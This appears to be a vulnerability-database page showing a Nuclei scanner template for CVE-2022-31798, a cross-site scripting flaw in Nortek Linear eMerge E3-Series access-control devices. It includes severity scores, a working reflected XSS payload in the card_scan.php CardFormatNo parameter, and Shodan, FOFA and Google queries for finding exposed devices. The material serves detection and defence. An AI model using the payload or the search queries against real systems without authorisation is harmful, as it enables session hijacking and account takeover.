Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-31798
HistoryAug 12, 2022 - 11:31 a.m.

Nortek Linear eMerge E3-Series - Cross-Site Scripting

2022-08-1211:31:04
ProjectDiscovery
github.com
10
cve2022
nortek
emerge
xss
packetstorm
nortekcontrol

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

47.5%

There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
id: CVE-2022-31798

info:
  name: Nortek Linear eMerge E3-Series - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.
  reference:
    - https://packetstormsecurity.com/files/167992/
    - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31798
    - https://eg.linkedin.com/in/omar-1-hashem
    - https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-31798
    cwe-id: CWE-384
    epss-score: 0.00126
    epss-percentile: 0.47221
    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: emerge_e3_firmware
    shodan-query:
      - http.title:"eMerge"
      - http.title:"emerge"
      - http.title:"linear emerge"
    fofa-query:
      - title="emerge"
      - title="linear emerge"
    google-query:
      - intitle:"linear emerge"
      - intitle:"emerge"
  tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol

http:
  - method: GET
    path:
      - '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a3dde001a70307e05079596d2b2b65580774dd51f984af29d559b429cb588f89022100d225944434eb1561774c75326ef0f9c1c90a4134de5feb8e554365cd44607403:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

47.5%

Related for NUCLEI:CVE-2022-31798